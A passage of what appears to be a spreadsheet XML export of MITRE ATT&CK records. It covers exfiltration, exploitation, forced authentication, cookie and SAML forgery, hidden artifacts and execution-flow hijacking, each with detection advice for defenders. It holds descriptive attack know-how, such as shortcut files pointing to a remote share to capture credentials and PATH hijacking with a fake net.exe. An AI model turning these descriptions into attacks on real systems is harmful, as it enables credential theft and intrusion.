    <s v="https://attack.mitre.org/techniques/T1052"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="8"/>
    <s v="Monitor file access on removable media. Detect processes that execute when removable media are mounted."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1052.001"/>
    <x v="210"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1052/001"/>
    <d v="2020-03-11T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="8"/>
    <s v="Monitor file access on removable media. Detect processes that execute when removable media are mounted."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, Drive: Drive Creation, File: File Access, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1052"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1567"/>
    <x v="211"/>
    <s v="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_x000a__x000a_Web service providers also commonly use SSL/TLS encryption, giving adversaries an added level of protection."/>
    <s v="https://attack.mitre.org/techniques/T1567"/>
    <d v="2020-03-09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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1567.002"/>
    <x v="212"/>
    <s v="Adversaries may exfiltrate data to a cloud storage service rather than over their primary command and control channel. Cloud storage services allow for the storage, edit, and retrieval of data from a remote cloud storage server over the Internet._x000a__x000a_Examples of cloud storage services include Dropbox and Google Docs. Exfiltration to these cloud storage services can provide a significant amount of cover to the adversary if hosts within the network are already communicating with the service. "/>
    <s v="https://attack.mitre.org/techniques/T1567/002"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="8"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1567"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1567.001"/>
    <x v="213"/>
    <s v="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_x000a__x000a_Exfiltration to a code repository can also provide a significant amount of cover to the adversary if it is a popular service already used by hosts within the network. "/>
    <s v="https://attack.mitre.org/techniques/T1567/001"/>
    <d v="2020-03-09T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1"/>
    <x v="8"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="1"/>
    <s v="T1567"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1190"/>
    <x v="214"/>
    <s v="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_x000a__x000a_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_x000a__x000a_For websites and databases, the OWASP top 10 and CWE top 25 highlight the most common web-based vulnerabilities.(Citation: OWASP Top 10)(Citation: CWE top 25)"/>
    <s v="https://attack.mitre.org/techniques/T1190"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-04-12T00:00:00"/>
    <n v="2.2999999999999998"/>
    <x v="15"/>
    <s v="Monitor application logs for abnormal behavior that may indicate attempted or successful exploitation. Use deep packet inspection to look for artifacts of common exploit traffic, such as SQL injection. Web Application Firewalls may detect improper inputs attempting exploitation."/>
    <s v="Containers, IaaS, Linux, Network, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content"/>
    <b v="0"/>
    <m/>
    <s v="Praetorian; Yossi Weizman, Azure Defender Research Team"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1203"/>
    <x v="215"/>
    <s v="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_x000a__x000a_Several types exist:_x000a__x000a_### Browser-based Exploitation_x000a__x000a_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_x000a__x000a_### Office Applications_x000a__x000a_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_x000a__x000a_### Common Third-party Applications_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1203"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-03-28T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="13"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <b v="1"/>
  </r>
  <r>
    <s v="T1212"/>
    <x v="216"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1212"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-03-25T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="0"/>
    <m/>
    <s v="John Lambert, Microsoft Threat Intelligence Center"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1211"/>
    <x v="217"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1211"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="0"/>
    <m/>
    <s v="John Lambert, Microsoft Threat Intelligence Center"/>
    <m/>
    <s v="Anti-virus, System access controls"/>
    <m/>
  </r>
  <r>
    <s v="T1068"/>
    <x v="218"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1068"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1.3"/>
    <x v="16"/>
    <s v="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_x000a__x000a_Higher privileges are often necessary to perform additional actions such as some methods of [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). Look for additional activity that may indicate an adversary has gained higher privileges."/>
    <s v="Containers, Linux, Windows, macOS"/>
    <s v="Driver: Driver Load"/>
    <b v="0"/>
    <m/>
    <s v="Idan Revivo, @idanr86, Team Nautilus Aqua Security; Joas Antonio dos Santos, @C0d3Cr4zy, Inmetrics; Yaniv Agman, @AgmanYaniv, Team Nautilus Aqua Security"/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1210"/>
    <x v="219"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Depending on the permissions level of the vulnerable remote service an adversary may achieve [Exploitation for Privilege Escalation](https://attack.mitre.org/techniques/T1068) as a result of lateral movement exploitation as well."/>
    <s v="https://attack.mitre.org/techniques/T1210"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="17"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="Application Log: Application Log Content, Network Traffic: Network Traffic Content"/>
    <b v="0"/>
    <m/>
    <s v="ExtraHop"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1133"/>
    <x v="220"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1133"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="2.2000000000000002"/>
    <x v="18"/>
    <s v="Follow best practices for detecting adversary use of [Valid Accounts](https://attack.mitre.org/techniques/T1078) for authenticating to remote services. Collect authentication logs and analyze for unusual access patterns, windows of activity, and access outside of normal business hours._x000a__x000a_When authentication is not required to access an exposed remote service, monitor for follow-on activities such as anomalous external use of the exposed API or application."/>
    <s v="Containers, Linux, Windows"/>
    <s v="Application Log: Application Log Content, Logon Session: Logon Session Metadata, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="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
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1008"/>
    <x v="221"/>
    <s v="Adversaries may use fallback or alternate communication channels if the primary channel is compromised or inaccessible in order to maintain reliable command and control and to avoid data transfer thresholds."/>
    <s v="https://attack.mitre.org/techniques/T1008"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-07-14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Connection Creation, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1083"/>
    <x v="222"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1083"/>
    <d v="2017-05-31T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1.3"/>
    <x v="2"/>
    <s v="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b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1222"/>
    <x v="223"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1222"/>
    <d v="2018-10-17T00:00:00"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="2.1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)"/>
    <s v="Linux, Windows, macOS"/>
    <s v="Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation"/>
    <b v="0"/>
    <m/>
    <s v="CrowdStrike Falcon OverWatch; Jan Miller, CrowdStrike"/>
    <m/>
    <s v="File system access controls"/>
    <m/>
  </r>
  <r>
    <s v="T1222.002"/>
    <x v="224"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1222/002"/>
    <d v="2020-02-04T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Consider enabling file/directory permission change auditing on folders containing key binary/configuration files."/>
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Metadata, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1222"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1222.001"/>
    <x v="225"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1222/001"/>
    <d v="2020-02-04T00:00:00"/>
    <d v="2020-09-01T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="12"/>
    <s v="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_x000a__x000a_Consider enabling file/directory permission change auditing on folders containing key binary/configuration files. For example, Windows Security Log events (Event ID 4670) are created when DACLs are modified.(Citation: EventTracker File Permissions Feb 2014)"/>
    <s v="Windows"/>
    <s v="Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1222"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1495"/>
    <x v="226"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1495"/>
    <d v="2019-04-12T00:00:00"/>
    <d v="2020-07-14T00:00:00"/>
    <n v="1"/>
    <x v="1"/>
    <s v="System firmware manipulation may be detected.(Citation: MITRE Trustworthy Firmware Measurement) Log attempts to read/write to BIOS and compare against known patching behavior."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Firmware: Firmware Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1187"/>
    <x v="227"/>
    <s v="Adversaries may gather credential material by invoking or forcing a user to automatically provide authentication information through a mechanism in which they can intercept._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_There are several different ways this can occur. (Citation: Osanda Stealing NetNTLM Hashes) Some specifics from in-the-wild use include:_x000a__x000a_*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_x000a_* A modified .LNK or .SCF file with the icon filename pointing to an external reference such as &lt;code&gt;\\[remote address]\pic.png&lt;/code&gt; that will force the system to load the resource when the icon is rendered to repeatedly gather credentials. (Citation: US-CERT APT Energy Oct 2017)"/>
    <s v="https://attack.mitre.org/techniques/T1187"/>
    <d v="2018-01-16T00:00:00"/>
    <d v="2020-06-19T00:00:00"/>
    <n v="1.2"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Monitor creation and modification of .LNK, .SCF, or any other files on systems and within virtual environments that contain resources that point to external network resources as these could be used to gather credentials when the files are rendered. (Citation: US-CERT APT Energy Oct 2017)"/>
    <s v="Windows"/>
    <s v="File: File Access, File: File Creation, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow"/>
    <b v="0"/>
    <m/>
    <s v="Sudhanshu Chauhan, @Sudhanshu_C; Teodor Cimpoesu"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1606"/>
    <x v="228"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1606"/>
    <d v="2020-12-17T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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
    <s v="Azure AD, Google Workspace, Linux, Office 365, SaaS, Windows, macOS"/>
    <s v="Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1606.002"/>
    <x v="229"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1606/002"/>
    <d v="2020-12-17T00:00:00"/>
    <d v="2021-04-14T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="11"/>
    <s v="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_x000a__x000a_Consider modifying SAML responses to include custom elements for each service provider. Monitor these custom elements in service provider access logs to detect any anomalous requests.(Citation: Sygnia Golden SAML)"/>
    <s v="Azure AD, Google Workspace, Office 365, SaaS, Windows"/>
    <s v="Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage"/>
    <b v="1"/>
    <s v="T1606"/>
    <s v="Blake Strom, Microsoft 365 Defender; Oleg Kolesnikov, Securonix"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1606.001"/>
    <x v="230"/>
    <s v="Adversaries may forge web cookies that can be used to gain access to web applications or Internet services. Web applications and services (hosted in cloud SaaS environments or on-premise servers) often use session cookies to authenticate and authorize user access._x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1606/001"/>
    <d v="2020-12-17T00:00:00"/>
    <d v="2021-01-11T00:00:00"/>
    <n v="1"/>
    <x v="11"/>
    <s v="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
    <s v="Linux, SaaS, Windows, macOS"/>
    <s v="Logon Session: Logon Session Creation, Web Credential: Web Credential Creation, Web Credential: Web Credential Usage"/>
    <b v="1"/>
    <s v="T1606"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1592"/>
    <x v="231"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T159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2.004"/>
    <x v="232"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1592/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92.003"/>
    <x v="233"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1592/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92.001"/>
    <x v="234"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1592/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92.002"/>
    <x v="235"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1592/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89"/>
    <x v="236"/>
    <s v="Adversaries may gather information about the victim's identity that can be used during targeting. Information about identities may include a variety of details, including personal data (ex: employee names, email addresses, etc.) as well as sensitive details such as credentials._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1589"/>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89.001"/>
    <x v="237"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1589/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89"/>
    <s v="Lee Christensen, SpecterOps; Toby Kohlenberg; Vinayak Wadhwa, Lucideus"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1589.002"/>
    <x v="238"/>
    <s v="Adversaries may gather email addresses that can be used during targeting. Even if internal instances exist, organizations may have public-facing email infrastructure and addresses for employees._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1589/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89"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1589.003"/>
    <x v="239"/>
    <s v="Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1589/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89"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1590"/>
    <x v="240"/>
    <s v="Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations._x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1590"/>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0.002"/>
    <x v="241"/>
    <s v="Adversaries may gather information about the victim's DNS that can be used during targeting. DNS information may include a variety of details, including registered name servers as well as records that outline addressing for a target’s subdomains, mail servers, and other hosts._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1590/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1"/>
    <x v="242"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1590/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5"/>
    <x v="243"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1590/005"/>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6"/>
    <x v="244"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1590/006"/>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4"/>
    <x v="245"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1590/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3"/>
    <x v="246"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1590/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1"/>
    <x v="247"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T159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1.002"/>
    <x v="248"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1591/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591.001"/>
    <x v="249"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1591/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591.003"/>
    <x v="250"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1591/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591.004"/>
    <x v="251"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1591/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200"/>
    <x v="252"/>
    <s v="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
    <s v="https://attack.mitre.org/techniques/T1200"/>
    <d v="2018-04-18T00:00:00"/>
    <d v="2021-04-22T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="15"/>
    <s v="Asset management systems may help with the detection of computer systems or network devices that should not exist on a network. _x000a__x000a_Endpoint sensors may be able to detect the addition of hardware via USB, Thunderbolt, and other external device communication ports."/>
    <s v="Linux, Windows, macOS"/>
    <m/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1564"/>
    <x v="253"/>
    <s v="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_x000a__x000a_Adversaries may also attempt to hide artifacts associated with malicious behavior by creating computing regions that are isolated from common security instrumentation, such as through the use of virtualization technology.(Citation: Sophos Ragnar May 2020)"/>
    <s v="https://attack.mitre.org/techniques/T1564"/>
    <d v="2020-02-26T00:00:00"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Monitor files, processes, and command-line arguments for actions indicative of hidden artifacts. Monitor event and authentication logs for records of hidden artifacts being used. Monitor the file system and shell commands for hidden attribute usage."/>
    <s v="Linux, Windows, macOS"/>
    <s v="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
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1564.005"/>
    <x v="254"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1564/005"/>
    <d v="2020-06-28T00:00:00"/>
    <d v="2020-06-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Modification, Firmware: Firmware Modification, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1564"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1564.001"/>
    <x v="255"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries can use this to their advantage to hide files and folders anywhere on the system and evading a typical user or system analysis that does not incorporate investigation of hidden files."/>
    <s v="https://attack.mitre.org/techniques/T1564/001"/>
    <d v="2020-02-26T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="Monitor the file system and shell commands for files being created with a leading &quot;.&quot; and the Windows command-line use of attrib.exe to add the hidden attribute."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Metadata, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1564"/>
    <m/>
    <m/>
    <s v="Host forensic analysis"/>
    <m/>
  </r>
  <r>
    <s v="T1564.002"/>
    <x v="256"/>
    <s v="Adversaries may use hidden users to mask the presence of user accounts they create. Every user account in macOS has a userID associated with it. When creating a user, you can specify the userID for that account._x000a__x000a_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s v="https://attack.mitre.org/techniques/T1564/002"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-07-31T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="This technique prevents the new user from showing up at the log in screen, but all of the other signs of a new user still exist. The user still gets a home directory and will appear in the authentication logs."/>
    <s v="macOS"/>
    <s v="File: File Modification, User Account: User Account Creation, User Account: User Account Metadata"/>
    <b v="1"/>
    <s v="T1564"/>
    <m/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1564.003"/>
    <x v="257"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_Adversaries may abuse these functionalities to hide otherwise visible windows from users so as not to alert the user to adversary activity on the system.(Citation: Antiquated Mac Malware)"/>
    <s v="https://attack.mitre.org/techniques/T1564/003"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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
    <s v="Windows, macOS"/>
    <s v="Command: Command Execution, File: File Modification, Process: Process Creation, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1564"/>
    <s v="Travis Smith, Tripwire"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1564.004"/>
    <x v="258"/>
    <s v="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_x000a__x000a_Adversaries may store malicious data or binaries in file attribute metadata instead of directly in files. This may be done to evade some defenses, such as static indicator scanning tools and anti-virus. (Citation: Journey into IR ZeroAccess NTFS EA) (Citation: MalwareBytes ADS July 2015)"/>
    <s v="https://attack.mitre.org/techniques/T1564/004"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-03-29T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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s v="Windows"/>
    <s v="Command: Command Execution, File: File Metadata, File: File Modification, Process: OS API Execution"/>
    <b v="1"/>
    <s v="T1564"/>
    <s v="Oddvar Moe, @oddvarmoe; Red Canary"/>
    <m/>
    <s v="Anti-virus, Host forensic analysis, Signature-based detection"/>
    <m/>
  </r>
  <r>
    <s v="T1564.006"/>
    <x v="259"/>
    <s v="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_x000a__x000a_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s v="https://attack.mitre.org/techniques/T1564/006"/>
    <d v="2020-06-29T00:00:00"/>
    <d v="2020-07-06T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_If virtualization software is installed by the adversary, the Registry may provide detection opportunities. Consider monitoring for [Windows Service](https://attack.mitre.org/techniques/T1543/003), with respect to virtualization software. _x000a__x000a_Benign usage of virtualization technology is common in enterprise environments, data and events should not be viewed in isolation, but as part of a chain of behavior."/>
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, Process: Process Creation, Service: Service Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1564"/>
    <s v="Janantha Marasinghe; Menachem Shafran, XM Cyber"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1564.007"/>
    <x v="260"/>
    <s v="Adversaries may hide malicious Visual Basic for Applications (VBA) payloads embedded within MS Office documents by replacing the VBA source code with benign data.(Citation: FireEye VBA stomp Feb 2020)_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1564/007"/>
    <d v="2020-09-17T00:00:00"/>
    <d v="2020-09-23T00:00:00"/>
    <n v="1"/>
    <x v="12"/>
    <s v="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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="File: File Content, Script: Script Execution"/>
    <b v="1"/>
    <s v="T1564"/>
    <s v="Rick Cole, FireEye"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574"/>
    <x v="261"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574"/>
    <d v="2020-03-12T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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_x000a__x000a_Monitor for changes to environment variables, as well as the commands to implement these changes._x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="Linux, Windows, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata, Windows Registry: Windows Registry Key Modification"/>
    <b v="0"/>
    <m/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1574.012"/>
    <x v="262"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/012"/>
    <d v="2020-06-24T00:00:00"/>
    <d v="2020-06-26T00:00:00"/>
    <n v="1"/>
    <x v="19"/>
    <s v="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
    <s v="Windows"/>
    <s v="Command: Command Execution, Module: Module Load, Process: Process Creation, Windows Registry: Windows Registry Key Modification"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Jesse Brown, Red Canary"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574.001"/>
    <x v="263"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/001"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="1.1000000000000001"/>
    <x v="19"/>
    <s v="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s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Module: Module Load"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Stefan Kanthak; Travis Smith, Tripwire"/>
    <m/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574.002"/>
    <x v="264"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/002"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2021-04-26T00:00:00"/>
    <n v="2"/>
    <x v="19"/>
    <s v="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
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1574"/>
    <m/>
    <m/>
    <s v="Anti-virus, Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1574.004"/>
    <x v="265"/>
    <s v="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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/004"/>
    <d v="2020-03-16T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="2"/>
    <x v="19"/>
    <s v="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_x000a__x000a_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
    <s v="macOS"/>
    <s v="File: File Creation, File: File Modification, Module: Module Load"/>
    <b v="1"/>
    <s v="T1574"/>
    <m/>
    <m/>
    <s v="Application control"/>
    <m/>
  </r>
  <r>
    <s v="T1574.006"/>
    <x v="266"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/006"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2021-04-27T00:00:00"/>
    <n v="2"/>
    <x v="19"/>
    <s v="Monitor for changes to environment variables and files associated with loading shared libraries such as &lt;code&gt;LD_PRELOAD&lt;/code&gt; and &lt;code&gt;DYLD_INSERT_LIBRARIES&lt;/code&gt;, as well as the commands to implement these changes._x000a__x000a_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
    <s v="Linux, macOS"/>
    <s v="Command: Command Execution, File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation"/>
    <b v="1"/>
    <s v="T1574"/>
    <m/>
    <s v="User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574.005"/>
    <x v="267"/>
    <s v="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_x000a__x000a_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_x000a__x000a_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
    <s v="https://attack.mitre.org/techniques/T1574/005"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-03-26T00:00:00"/>
    <n v="1"/>
    <x v="19"/>
    <s v="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_x000a__x000a_Look for abnormal process call trees from typical processes and services and for execution of other commands that could relate to Discovery or other adversary techniques."/>
    <s v="Windows"/>
    <s v="File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation, Service: Service Metadata"/>
    <b v="1"/>
    <s v="T1574"/>
    <s v="Stefan Kanthak; Travis Smith, Tripwire"/>
    <s v="Administrator, User"/>
    <m/>
    <m/>
  </r>
  <r>
    <s v="T1574.007"/>
    <x v="268"/>
    <s v="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_x000a__x000a_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_x000a__x000a_For example, if &lt;code&gt;C:\example path&lt;/code&gt; precedes &lt;/code&gt;C:\Windows\system32&lt;/code&gt; is in the PATH environment variable, a program that is named net.exe and placed in &lt;code&gt;C:\example path&lt;/code&gt; will be called instead of the Windows system &quot;net&quot; when &quot;net&quot; is executed from the command-line."/>
    <s v="https://attack.mitre.org/techniques/T1574/007"/>
    <d v="2020-03-13T00:00:00"/>
    <d v="2020-09-16T00:00:00"/>
    <n v="1"/>
    <x v="19"/>
